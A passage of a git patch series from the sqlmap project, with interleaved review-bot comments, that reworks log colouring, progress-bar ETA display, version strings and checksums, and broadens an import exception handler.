@@ -1,6 +1,8 @@ # # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. +# (Note: 2018 modifications by @stamparm) # + import logging import os import re @@ -127,9 +129,9 @@ def output_colorized(self, message): ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) - def colorize(self, message, record): - if record.levelno in self.level_map and self.is_tty: - bg, fg, bold = self.level_map[record.levelno] + def colorize(self, message, levelno): + if levelno in self.level_map and self.is_tty: + bg, fg, bold = self.level_map[levelno] params = [] if bg in self.color_map: @@ -148,11 +150,32 @@ def colorize(self, message, record): else: prefix = "" - message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), - 'm', message, self.reset))) + match = re.search(r"\[([A-Z]+)\]", message) + if match: + level = match.group(1) + if message.startswith("\x1b[1m"): + message = message.replace("\x1b[1m", "") + reset = self.reset + "\x1b[1m" + params.append('1') + else: + reset = self.reset + message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) + else: + message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), 'm', message, self.reset))) + + match = re.search(r"\A\s*\[([\d:]+)\]", message) + if match: + time = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith("\x1b[1m"): # bold + reset = self.reset + "\x1b[1m" + else: + reset = self.reset + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) return message def format(self, record): message = logging.StreamHandler.format(self, record) - return self.colorize(message, record) + return self.colorize(message, record.levelno) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b5a0c6d5800..467d7de28d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
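Review bot: In the new time block the `reset` selection has two identical arms — `if not message.endswith(self.reset): reset = self.reset` and the final `else: reset = self.reset` — so the bold-restoring arm only runs when the message both ends with a reset and still starts with `\x1b[1m`, which the level block just stripped; the three arms collapse to `reset = self.reset + "\x1b[1m" if message.endswith(self.reset) and message.startswith("\x1b[1m") else self.reset`, or the dead arm needs a comment explaining when it can fire. The same pattern is repeated in the counter block added in the `@@ -174,6 +174,17 @@` hunk of the next commit and again in the `Fixes #3172` rewrite. Separately, `message.replace(level, ..., 1)` recolours the first occurrence of the bare captured word rather than the matched tag, and `message.replace("\x1b[1m", "")` strips every bold escape in the message rather than only the leading one; slicing around `match.span(1)` and `message[len("\x1b[1m"):]` would be the exact forms.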
@@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6c3ba41569f9403aef6cd9312fe9b96e lib/core/common.py +ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -af78e555614c7e1bf89c37271831b486 lib/core/settings.py +9f27c2f2abae2c21eb623f16abfeccf9 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -368165b45dadcdff4422bc010700832a thirdparty/ansistrm/ansistrm.py +b743632abd4eee8654f98dcfdb753246 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 4ecf6eee05e8ed844b596d97bdc300a33b972540 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Jul 2018 14:21:32 +0200 Subject: [PATCH 197/428] Minor style update --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 13 ++++++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 15 insertions(+), 4 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 873a5efc8ca..d55e241ec8c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.5" +VERSION = "1.2.7.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 5ecc0596123..02b0b85eb5c 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -150,7 +150,7 @@ def colorize(self, message, levelno): else: prefix = "" - match = re.search(r"\[([A-Z]+)\]", message) + match = re.search(r"\[([A-Z ]+)\]", message) if match: level = match.group(1) if message.startswith("\x1b[1m"): @@ -174,6 +174,17 @@ def colorize(self, message, levelno): reset = self.reset message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + match = re.search(r"\[(#\d+)\]", message) + if match: + counter = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith("\x1b[1m"): # bold + reset = self.reset + "\x1b[1m" + else: + reset = self.reset + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + return message def format(self, record): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 467d7de28d9..87116f163aa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f27c2f2abae2c21eb623f16abfeccf9 lib/core/settings.py +f1e0cc7708df13f9f973dbcabfd77007 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -b743632abd4eee8654f98dcfdb753246 thirdparty/ansistrm/ansistrm.py +2350c4ab8a9972980ad93466066294e9 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From b44551230ed018e5654035cf99a150e214aac965 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Jul 2018 15:13:51 +0200 Subject: [PATCH 198/428] Fixes #3165 --- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 6 +++--- lib/techniques/error/use.py | 2 +- lib/techniques/union/use.py | 4 ++-- lib/utils/progress.py | 34 +++++++++++++++---------------- txt/checksum.md5 | 10 ++++----- 6 files changed, 28 insertions(+), 30 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d55e241ec8c..a0f2325c0d3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.6" +VERSION = "1.2.7.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index e08c5b6c627..2ed93597b2c 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -485,7 +485,7 @@ def blindThread(): if kb.threadContinue: if showEta: - progress.progress(calculateDeltaSeconds(start), threadData.shared.index[0]) + progress.progress(threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 @@ -578,7 +578,7 @@ def blindThread(): # Did we have luck? if result: if showEta: - progress.progress(calculateDeltaSeconds(start), len(commonValue)) + progress.progress(len(commonValue)) elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(commonValue[index - 1:])) @@ -628,7 +628,7 @@ def blindThread(): threadData.shared.value = partialValue = partialValue + val if showEta: - progress.progress(calculateDeltaSeconds(start), index) + progress.progress(index) elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(val)) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 495fac78a22..6aac89350ef 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py 
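Review bot: With the elapsed-time argument dropped from all three `progress.progress(...)` calls in `blindThread`, the `start` variable and the `calculateDeltaSeconds` import in this file may no longer have any reader; both are defined outside the hunks, so this is worth a linter pass rather than an assertion. The same applies to `valueStart` in the `lib/techniques/error/use.py` and `lib/techniques/union/use.py` hunks below, whose only visible use was the removed `time.time() - valueStart` argument.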
@@ -419,7 +419,7 @@ def errorThread(): with kb.locks.value: index = None if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 8d69f9c9b5c..30c986d4b41 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -333,7 +333,7 @@ def unionThread(): items = parseUnionPage(output) if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + threadData.shared.progress.progress(threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: @@ -355,7 +355,7 @@ def unionThread(): else: index = None if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break diff --git a/lib/utils/progress.py b/lib/utils/progress.py index e1cb4ca668b..1776fb25ade 100644 --- a/lib/utils/progress.py +++ b/lib/utils/progress.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +import time + from lib.core.common import getUnicode from lib.core.common import dataToStdout from lib.core.data import conf 
@@ -17,13 +19,12 @@ class ProgressBar(object): def __init__(self, minValue=0, maxValue=10, totalWidth=None): self._progBar = "[]" - self._oldProgBar = "" self._min = int(minValue) self._max = int(maxValue) self._span = max(self._max - self._min, 0.001) self._width = totalWidth if totalWidth else conf.progressWidth self._amount = 0 - self._times = [] + self._start = None self.update() def _convertSeconds(self, value): @@ -52,7 +53,7 @@ def update(self, newAmount=0): percentDone = min(100, int(percentDone)) # Figure out how many hash bars the percentage should be - allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max)) + allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max)) numHashes = (percentDone / 100.0) * allFull numHashes = int(round(numHashes)) @@ -68,19 +69,18 @@ def update(self, newAmount=0): percentString = getUnicode(percentDone) + "%" self._progBar = "%s %s" % (percentString, self._progBar) - def progress(self, deltaTime, newAmount): + def progress(self, newAmount): """ This method saves item delta time and shows updated progress bar with calculated eta """ - if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max: + if self._start is None or newAmount > self._max: + self._start = time.time() eta = None else: - midTime = sum(self._times) / len(self._times) - midTimeWithLatest = (midTime + deltaTime) / 2 - eta = midTimeWithLatest * (self._max - newAmount) + delta = time.time() - self._start + eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta - self._times.append(deltaTime) self.update(newAmount) self.draw(eta) 
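Review bot: The new ETA formula divides by `newAmount` (`1.0 * delta / newAmount`), so any call after the first with `newAmount == 0` raises `ZeroDivisionError` from the display path; the guard that resets `_start` only covers `None` and overshoot. It also ignores `self._min`: the total is scaled by `(self._max - self._min)` while the rate uses the absolute `newAmount`, which mis-estimates whenever `minValue` is non-zero. Guarding on progress relative to the minimum fixes both: `if self._start is None or newAmount > self._max or newAmount <= self._min:` for the reset branch and `eta = (self._max - newAmount) * (delta / float(newAmount - self._min))` for the estimate. The docstring still says the method "saves item delta time", which the rewrite no longer does; the rest of `ProgressBar` is outside the hunk.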
@@ -89,15 +89,13 @@ def draw(self, eta=None): This method draws the progress bar if it has changed """ - if self._progBar != self._oldProgBar: - self._oldProgBar = self._progBar - dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else "")) - if self._amount >= self._max: - if not conf.liveTest: - dataToStdout("\r%s\r" % (" " * self._width)) - kb.prependFlag = False - else: - dataToStdout("\n") + dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not None else "??:??")))) + if self._amount >= self._max: + if not conf.liveTest: + dataToStdout("\r%s\r" % (" " * self._width)) + kb.prependFlag = False + else: + dataToStdout("\n") def __str__(self): """ diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 87116f163aa..5fe5616ba7e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f1e0cc7708df13f9f973dbcabfd77007 lib/core/settings.py +c4439324bd9484f4a35d648a20d7bf87 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
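Review bot: The docstring just above the changed lines still promises the bar is drawn only "if it has changed", but the `_oldProgBar` comparison that implemented that is removed, so `draw()` now writes to stdout on every call; the docstring should read `This method draws the progress bar with the given eta`. If the unconditional redraw is deliberate because the ETA text changes between calls even when the bar does not, a one-line comment saying so would pre-empt someone reintroducing the guard. `draw` begins outside the hunk.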
@@ -89,17 +89,17 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py -4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py +09beb19c2ec9fdd14329f1c0b59a2d05 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py +b9f6148c8df6b9d3316ce082dc1a63dd lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py +8b770864bdb106ef50c70173c824395c lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py @@ -111,7 +111,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py -5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py +683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py From e84142b6a963322dc4acdf7605b374901141686d Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 6 Jul 2018 16:18:04 +0200 Subject: [PATCH 199/428] Fixes #3172 --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 56 ++++++++++++++++++--------------- txt/checksum.md5 | 4 +-- 3 files changed, 33 insertions(+), 29 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a0f2325c0d3..2aa98ecb5cc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.7" +VERSION = "1.2.7.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 02b0b85eb5c..c3fc6987f8b 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -45,6 +45,7 @@ class ColorizingStreamHandler(logging.StreamHandler): } csi = '\x1b[' reset = '\x1b[0m' + bold = "\x1b[1m" disable_coloring = False @property 
@@ -150,40 +151,43 @@ def colorize(self, message, levelno): else: prefix = "" - match = re.search(r"\[([A-Z ]+)\]", message) + match = re.search(r"\[([A-Z ]+)\]", message) # log level if match: level = match.group(1) - if message.startswith("\x1b[1m"): - message = message.replace("\x1b[1m", "") - reset = self.reset + "\x1b[1m" + if message.startswith(self.bold): + message = message.replace(self.bold, "") + reset = self.reset + self.bold params.append('1') else: reset = self.reset message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) - else: - message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), 'm', message, self.reset))) - match = re.search(r"\A\s*\[([\d:]+)\]", message) - if match: - time = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif message.startswith("\x1b[1m"): # bold - reset = self.reset + "\x1b[1m" - else: - reset = self.reset - message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + match = re.search(r"\A\s*\[([\d:]+)\]", message) # time + if match: + time = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith(self.bold): # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + + match = re.search(r"\[(#\d+)\]", message) # counter + if match: + counter = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith(self.bold): # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + else: + message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) - match = re.search(r"\[(#\d+)\]", message) - if match: - counter = match.group(1) - if not 
message.endswith(self.reset): - reset = self.reset - elif message.startswith("\x1b[1m"): # bold - reset = self.reset + "\x1b[1m" - else: - reset = self.reset - message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + if prefix: + message = "%s%s" % (prefix, message) return message diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5fe5616ba7e..d5b7b6e9c6b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c4439324bd9484f4a35d648a20d7bf87 lib/core/settings.py +21189972adee4e784a2ffad146550749 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -2350c4ab8a9972980ad93466066294e9 thirdparty/ansistrm/ansistrm.py +0424227a228a2b5b53ad1d6df4240ddd thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 558484644a730343fffb469d3cb11b0f8b1edfad Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Jul 2018 16:22:19 +0200 Subject: [PATCH 200/428] Minor refactoring --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 7 ++----- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 8 deletions(-) 
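Review bot: The restructure moves the time and counter colouring inside the `if match:` for the `[LEVEL]` tag, so a line without a level tag now only gets the whole-line colour of the new `else` branch and no cyan timestamp or yellow counter, where the previous version applied them independently; if every logged line carries a level tag this is fine, but a comment such as `# time/counter colouring only applies to level-tagged lines` records the intent. Within the level block `message.replace(self.bold, "")` removes every bold escape in the message rather than only the leading one, and because it runs first, the later `elif message.startswith(self.bold)` arms in the time and counter blocks appear unreachable, leaving `if not message.endswith(self.reset)` and the final `else` as two identical arms in each block. Computing the bold-aware `reset` once in the level block and reusing it for the time and counter tags would remove both the repetition and the dead arms. The hunk spans two source lines; `colorize` begins before it.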
diff --git a/lib/core/settings.py b/lib/core/settings.py index 2aa98ecb5cc..0a4911b6eb5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.8" +VERSION = "1.2.7.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index c3fc6987f8b..1299206c09b 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -145,11 +145,8 @@ def colorize(self, message, levelno): params.append('1') if params and message: - if message.lstrip() != message: - prefix = re.search(r"\s+", message).group(0) - message = message[len(prefix):] - else: - prefix = "" + match = re.search(r"\A(\s+)", message) + prefix = match.group(1) if match else "" match = re.search(r"\[([A-Z ]+)\]", message) # log level if match: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d5b7b6e9c6b..1aa07e715ac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -21189972adee4e784a2ffad146550749 lib/core/settings.py +4c026aa83372dded4cb70cbdb677fb81 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
@@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -0424227a228a2b5b53ad1d6df4240ddd thirdparty/ansistrm/ansistrm.py +641fc9d8f1f8ccb4488f717668422c21 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 7b705b94e3c560dc0b37648a7127a73e2edae2c0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Jul 2018 12:20:18 +0200 Subject: [PATCH 201/428] Fixes #3171 --- lib/core/settings.py | 2 +- lib/utils/hash.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0a4911b6eb5..c4144f9020b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.9" +VERSION = "1.2.7.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 6487ba25a0c..f92f19bd038 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -7,7 +7,7 @@ try: from crypt import crypt -except ImportError: +except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171 from thirdparty.fcrypt.fcrypt import crypt _multiprocessing = None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1aa07e715ac..93f7d99b504 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
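Review bot: The widened bare `except:` around `from crypt import crypt` also swallows `KeyboardInterrupt` and `SystemExit` raised during the import, which is broader than the workaround needs; `except Exception:  # not only ImportError, see #3171` keeps the fallback to `thirdparty.fcrypt` for any failing import of `crypt` while leaving interpreter-control exceptions alone. If the failure behind #3171 is a specific exception type, naming it alongside `ImportError` would be more precise still and would keep genuinely unexpected errors visible.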
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4c026aa83372dded4cb70cbdb677fb81 lib/core/settings.py +f140b81ca26a2eb0e071cb6837352d28 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -107,7 +107,7 @@ de9620f03231d8329ee8434884b6bacd lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py +4d5b2262ad495301706a4cf4c565abec lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From 53eadb0af80d96ede2b3e109aec3994661b0a01f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Jul 2018 12:22:51 +0200 Subject: [PATCH 202/428] Fixes #3173 --- lib/core/settings.py | 2 +- plugins/dbms/postgresql/fingerprint.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 